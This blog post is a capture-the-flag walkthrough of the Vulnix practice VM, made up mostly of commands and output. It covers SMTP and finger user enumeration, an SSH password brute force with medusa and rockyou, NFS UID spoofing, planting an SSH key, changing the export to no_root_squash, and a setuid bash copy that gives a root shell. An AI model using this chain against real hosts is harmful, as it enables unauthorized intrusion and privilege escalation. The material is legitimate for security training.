Mr_H4sh

Infosec, CTF and more

Vulnix Solution

In this post I’m going to show you how to solve the Vulnix VM provided by Owen.

You can find the VM on this link

192.168.56.102 <== attacker
192.168.56.103 <== victim

A port scan on the victim host gives this:

# nmap -sT -p- -Pn -n -v 192.168.56.103 -T5

PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
79/tcp    open  finger
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
993/tcp   open  imaps
995/tcp   open  pop3s
2049/tcp  open  nfs
33461/tcp open  unknown
34661/tcp open  unknown
35565/tcp open  unknown
46272/tcp open  unknown
49130/tcp open  unknown

As I see, there are some ports open that could be interesting for some user enumeration: 25(smtp), 79(finger) and 111(rpcbind). I start doing some manual attempts to fetch users on the port 25 (smtp):

# telnet 192.168.56.103 25
Trying 192.168.56.103...
Connected to 192.168.56.103.
Escape character is '^]'.
220 vulnix ESMTP Postfix (Ubuntu)
ehlo server
250-vulnix
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
vrfy root
252 2.0.0 root
vrfy admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table
vrfy user
252 2.0.0 user
vrfy administrator
550 5.1.1 <administrator>: Recipient address rejected: User unknown in local recipient table
vrfy vulnix
252 2.0.0 vulnix

I find 3 users on the system: root, user and vulnix. I go ahead with some research using finger:

# finger @192.168.56.103
No one logged on.
root@karen:/mnt# finger root@192.168.56.103
finger root@192.168.56.103
Login: root                 Name: root
Directory: /root                      Shell: /bin/bash
Never logged in.
No mail.
No Plan.

# finger user@192.168.56.103
Login: user                 Name: user
Directory: /home/user                 Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull             Name: Dovecot login user
Directory: /nonexistent               Shell: /bin/false
Never logged in.
No mail.
No Plan.

# finger vulnix@192.168.56.103
Login: vulnix               Name: 
Directory: /home/vulnix               Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Interestingly, the user user also has a virtual user for Dovecot, but with no login. Dovecot is an open source email server. This could be useful information to bear in mind.

The service rpcbind is open. This is useful to do some RPC enumeration:

# rpcinfo -p 192.168.56.103
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  55327  status
    100024    1   tcp  46272  status
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    2   tcp   2049
    100227    3   tcp   2049
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100227    2   udp   2049
    100227    3   udp   2049
    100021    1   udp  53621  nlockmgr
    100021    3   udp  53621  nlockmgr
    100021    4   udp  53621  nlockmgr
    100021    1   tcp  49130  nlockmgr
    100021    3   tcp  49130  nlockmgr
    100021    4   tcp  49130  nlockmgr
    100005    1   udp  60970  mountd
    100005    1   tcp  35565  mountd
    100005    2   udp  58037  mountd
    100005    2   tcp  34661  mountd
    100005    3   udp  37005  mountd
    100005    3   tcp  33461  mountd

Now I know for sure that the NFS is listening on port 2049/tcp and 2049/udp. At this point it’s time to do some NFS enumeration:

# showmount -e 192.168.56.103
Export list for 192.168.56.103:
/home/vulnix *

This means that a share is accessible from any host. So I mount the location of this share on my local machine:

# mount 192.168.56.103:/home/vulnix /mnt/vulnix/

but when I try to access the folder, I retrieve an access denied. I try to change permissions to access, but I retrieve the same error. I think root squashing is enabled, since I’ve been to a training course run by the creator of this VM and he often mentioned to keep it enabled.

At this point, I decide to bruteforce the passwords of the users that I’ve retrieved. I create a file collecting all the users (without the user dovenull, who doesn’t have a login access):

# cat users.txt

root
user
vulnix

and I use the wordlist rockyou.txt to crack the password:

# medusa -h 192.168.56.103 -U users.txt -P /usr/share/wordlists/rockyou.txt -e ns -f -M ssh > medusa_output.txt

I finally crack the password of the user user, which is letmein.

# ssh user@192.168.56.103
user@192.168.56.103's password: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Feb  6 18:59:53 GMT 2016

  System load:  0.16             Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.56.103
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

user@vulnix:~$ 

Of course, this user is not a sudoer.

Last resort is trying to log in as user vulnix.

I check the /etc/passwd file on the victim server, and I find out that the user vulnix has UID 2008, so I create a user called vulnix on my local machine with UID as 2008 and try to access again the partition:

# mkdir /home/vulnix
# vim /etc/passwd
# su - vulnix
vulnix@karen:~$ cd /mnt/
vulnix@karen:/mnt$ ls -l
total 4
drwxr-x--- 2 4294967294 4294967294 4096 Sep  2  2012 vulnix
vulnix@karen:/mnt$ cd vulnix
vulnix@karen:/mnt/vulnix$ ls -la
total 20
drwxr-x--- 2 4294967294 4294967294 4096 Sep  2  2012 .
drwxr-xr-x 3 root       root       4096 Feb  6 17:48 ..
-rw-r--r-- 1 4294967294 4294967294  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 4294967294 4294967294 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 4294967294 4294967294  675 Apr  3  2012 .profile

I’m in, so I generate an SSH key to log in on the server as user vulnix without password:

this is on my local machine as myself, generating a new ssh-key:
# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):      
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
c0:62:1d:58:df:9e:ab:2d:cb:97:ac:65:5c:bf:3e:cf root@karen
The key's randomart image is:
+---[RSA 2048]----+
|     oo          |
|    .o o .       |
|    o + . .      |
|   . . . . .     |
|        S o .    |
|         . o .   |
|         .=.  .  |
|       ..=+   .o |
|        ==.  .ooE|
+-----------------+

# cat /root/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RaeMdpTMXa+biV7pwsvAhzlf4XhMjO9Ia6JM0zAgHN8JsW1FXVtxX90xBJ2CKrYu5aj7PYAlZDxoAMYYLF402pkwKU89j9U38malcuTWRNbj6NNI3BeWRDcxdHsKu8b42xIFGKmBIitZRRCl4uKXDV/WIejdK9vWRTNaYZ9W33vwXEhjyYH/HvBhNpmYYMiqzahhRNqd1Ir6qtaVdQPE63Bu3EY9mfTg5XtnPQzoHlnCkDLFwBVrSPXHnnjnAoSNoAc25ff0A6gveqnRAz8lWqOPJ5cruHzXE3ZOQXfTcH71h0a1uBEoMw9GPkuJM7ba6OwZALVEfO15LkliBZ0t root@karen



and on another terminal as `vulnix` user, copying the generated ssh-key into the `/home/vulnix/.ssh/authorized_keys` file:
vulnix@karen:/mnt/vulnix$ mkdir .ssh
vulnix@karen:/mnt/vulnix$ cd .ssh  
vulnix@karen:/mnt/vulnix/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RaeMdpTMXa+biV7pwsvAhzlf4XhMjO9Ia6JM0zAgHN8JsW1FXVtxX90xBJ2CKrYu5aj7PYAlZDxoAMYYLF402pkwKU89j9U38malcuTWRNbj6NNI3BeWRDcxdHsKu8b42xIFGKmBIitZRRCl4uKXDV/WIejdK9vWRTNaYZ9W33vwXEhjyYH/HvBhNpmYYMiqzahhRNqd1Ir6qtaVdQPE63Bu3EY9mfTg5XtnPQzoHlnCkDLFwBVrSPXHnnjnAoSNoAc25ff0A6gveqnRAz8lWqOPJ5cruHzXE3ZOQXfTcH71h0a1uBEoMw9GPkuJM7ba6OwZALVEfO15LkliBZ0t root@karen" > authorized_keys
vulnix@karen:/mnt/vulnix/.ssh$ 
vulnix@karen:/mnt/vulnix/.ssh$ ls -l
total 4
-rw-r--r-- 1 4294967294 4294967294 392 Feb  6 19:17 authorized_keys



and then I login on the victim's machine as `vulnix`:
# ssh vulnix@192.168.56.103
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Feb  6 19:21:13 GMT 2016

  System load:  0.0              Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 8%               IP address for eth0: 192.168.56.103
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$ whoami
vulnix
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix) 

I don't know vulnix's password, but I find out that is a sudoer:
$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

This is good, since vulnix can run a command to open /etc/exports even without typing a password. This is what I find:

$ sudoedit /etc/exports

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)

Remember what I said about Root squashing before? (thanks for the lession, Owen xD)

I replace the root_squash flag with no_root_squash. I need to cheat a bit since I don’t have vulnix’s password and there’s no way to export again the NFS partition without a sudo user executing the command /usr/sbin/exportfs -a or a machine reboot, so I reboot it manually (Boooooo, what a n0o0o0o0ob!!)

Once the machine has rebooted, I mount the partition again and access as local root user.

I check that the machine is up again (SORRY AGAIN!):

# ping -c 4 192.168.56.103
PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.
64 bytes from 192.168.56.103: icmp_seq=1 ttl=64 time=1.25 ms
64 bytes from 192.168.56.103: icmp_seq=2 ttl=64 time=1.16 ms
64 bytes from 192.168.56.103: icmp_seq=3 ttl=64 time=1.19 ms
64 bytes from 192.168.56.103: icmp_seq=4 ttl=64 time=1.11 ms

--- 192.168.56.103 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3010ms
rtt min/avg/max/mdev = 1.115/1.182/1.257/0.066 ms

and I mount the partition again:

# mount 192.168.56.103:/home/vulnix /mnt/vulnix 

Once mounted, I get a copy of the victim’s machine local shell and I change the ownership and SID to the root one:

On the victim's machine, as `vulnix`:
$ cp /bin/bash local_shell

On my local machine, as `root`:
# ls -l
total 900
-rwxr-xr-x 1 4294967294 4294967294 920788 Feb  6 20:53 local_shell
root@karen:/mnt/vulnix# cat local_shell > spawn_root_shell
root@karen:/mnt/vulnix# chmod 4777 !$
chmod 4777 spawn_root_shell

On the victim's machine I then execute the shell keeping the original file's permissions with the flag `-p`:

$ ls -l
total 1800
-rwxr-xr-x 1 vulnix vulnix 920788 Feb  6 20:53 local_shell
-rwsrwxrwx 1 root   root   920788 Feb  6 20:54 spawn_root_shell
$ ./spawn_root_shell -p
spawn_root_shell-4.2# whoami
root
spawn_root_shell-4.2#
# cd /root/
spawn_root_shell-4.2# ls -l
total 4
-r-------- 1 root root 33 Sep  2  2012 trophy.txt
spawn_root_shell-4.2# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be

This is a fairly advanced hacking challenge, which involves techniques of enumeration, password cracking and privilege escalation.

Thanks to Owen for the VM.

Conclusion

As usual, for any information or comment, please do not hesitate to leave a comment.

./A